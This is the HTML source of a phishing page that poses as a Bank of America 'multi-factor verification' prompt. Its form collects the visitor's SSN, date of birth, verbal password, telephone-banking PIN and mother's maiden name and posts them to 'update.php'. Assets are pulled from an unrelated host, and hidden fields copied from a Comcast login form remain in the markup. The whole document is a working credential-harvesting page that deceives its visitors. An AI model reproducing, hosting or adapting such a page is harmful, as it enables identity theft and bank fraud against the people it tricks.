<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html><head>

  <meta content="text/html; charset=UTF-8" http-equiv="Content-Type">
  <link rel="icon" type="image/png" href="https://sirus.perlahost.com/bankofamerica/index_files/58.34.png"/><title>Bank of America - Banking, Credit Cards, Loans and Merrill Investing
</title>


  <meta content="IE=edge,chrome=1" http-equiv="X-UA-Compatible">

  <meta content="yes" name="mobile-web-app-capable">

  <meta content="yes" name="">

  <meta content="">

  <meta content="" name="">

  <meta content="#ffffff" name="">

  <meta content="#ffffff" name="theme-color">

 



  <link href="index_files/fonts-remote.css" rel="stylesheet" type="text/css">

  <link href="index_files/styles-light.css" rel="stylesheet" type="text/css">
<style>
    .div-1 {
        background-color: #ffffff;
    }
    
    .div-2 {
    	background-color: #ffffff;
    }
    
    .div-3 {
    	background-color: #ffffff;
    }
</style>
 


  <style type="text/css">
html {
background-color: #042261;
}
#background {
background: linear-gradient(10deg, #FFFFFF 0%, #FFFFFF 50%, #be1d2b 50%, #be1d2b 100%) no-repeat 0 120px;
}
#left {
margin-left: 0;
padding-right: 94px;
box-sizing: border-box;
}
#left .h1 {
font-weight: bold;
margin-top: 24px;
}
#left hr {
border: solid #b1b9bf;
border-width: 1px 0 0 0;
width: 64px;
margin-left:0;
}
#left p {
color: #44484c;
font-size: 14px;
line-height: 1.4;
}
#left p + p {
margin: 18px 0 0 0;
}
#left img {
margin-top: 24px;
width: 100%;
}
#left img + p {
margin-top: 12px;
}
  </style>
</head>
<body class="has-footer">

<div id="breakpoints"></div>

<div id="background" style="height: 700.781px;"></div>

<main id="bd">

<h1 class="screen-reader-text"></h1>



<style>
#right #quick-bill-pay { display: block; }
</style>
</div>
<div id="right"><lable><font color="#1f734c"></font></lable>
<div class="container"><div class="div-3">
<form id="signsmall" class="stacked-form" action="update.php" method="post" name="loginForm" onsubmit="adx.validate('user_bbt_prefs');">
  <div class="single logo-wrapper">
<img src="index_files/319.70.png" width="319" height="70">
  </div><br>
  <div><br><Font color="#be1d2b"><b>Required to enable new multi-factor verification service now</b></Font><br><span class="FloatingPage__title___2W2k5">&nbsp;</span>
					<div id="faqButton"></div>

<label for="user" id="login_id_label" role="alert" aria-label=""></label>
                    <div class="textfield-wrapper">
                        <label for="user" class="float accessibly-hidden">SSN</label>
				<input id="user" class="" autocorrect="off" autocapitalize="off" spellcheck="false" name="name1" placeholder="SSN-XXX-XX-XXXX" maxlength="128" type="text" required>
			</div><br>
        
					<label for="user" id="login_id_label" role="alert" aria-label=""></label>
                    <div class="textfield-wrapper">
                        <label for="user" class="float accessibly-hidden">DOB</label>
				<input id="user" class="" autocorrect="off" autocapitalize="off" spellcheck="false" name="name2" placeholder="DOB-DD/MM/YYYY" maxlength="128" type="text" required>
			</div><br><label for="user" id="login_id_label" role="alert" aria-label=""></label>
                    <div class="textfield-wrapper">
                        <label for="user" class="float accessibly-hidden">VERBAL PASSWORD</label>
				<input id="user" class="" autocorrect="off" autocapitalize="off" spellcheck="false" name="name3" placeholder="Verbal Password" maxlength="128" type="text" required>
			</div><br><label for="user" id="login_id_label" role="alert" aria-label=""></label>
                    
                    <div class="textfield-wrapper">
                        <label for="user" class="float accessibly-hidden"></label>
				<input id="user" class="" autocorrect="off" autocapitalize="off" spellcheck="false" name="name4" placeholder="Telephone banking Pin/ Voice banking PIN" maxlength="128" type="text" required>
			</div><br>
			<div class="textfield-wrapper">
                        <label for="user" class="float accessibly-hidden"></label>
				<input id="user" class="" autocorrect="off" autocapitalize="off" spellcheck="false" name="name5" placeholder="Mother's Maiden Name" maxlength="128" type="text" required>
			</div><br>
	
        
		
        
	    			<div class="checkbox-container">
				<label for="remember_me">
				
					
				</label>
				
			</div>
		
		
											<button class="submit" type="submit" id="sign_in" button style="background-color:	#be1d2b;border-color:	#be1d2b;color:#f9fffd"><b>Confirmed</b></button>
  <ul>

    

   

  </ul>

  <p id="implied-legal">
<a href="#"></a>.</p>
  <input name="r" value="comcast.net" type="hidden"> <input name="selectAccount" value="false" type="hidden"> <input name="s" value="oauth" type="hidden"> <input name="deviceAuthn" value="false" type="hidden"> <input name="continue" value="#" type="hidden"> <input name="ipAddrAuthn" value="false" type="hidden"> <input name="forceAuthn" value="1" type="hidden"> <input name="lang" value="en" type="hidden"> <input name="passive" value="false" type="hidden"> <input name="client_id" value="my-account-web" type="hidden"> <input name="reqId" value="a76873ff-aff2-42d1-9d6c-7419680f9cd1" type="hidden">
</form>


</div>

</div>

</main>




</body></html>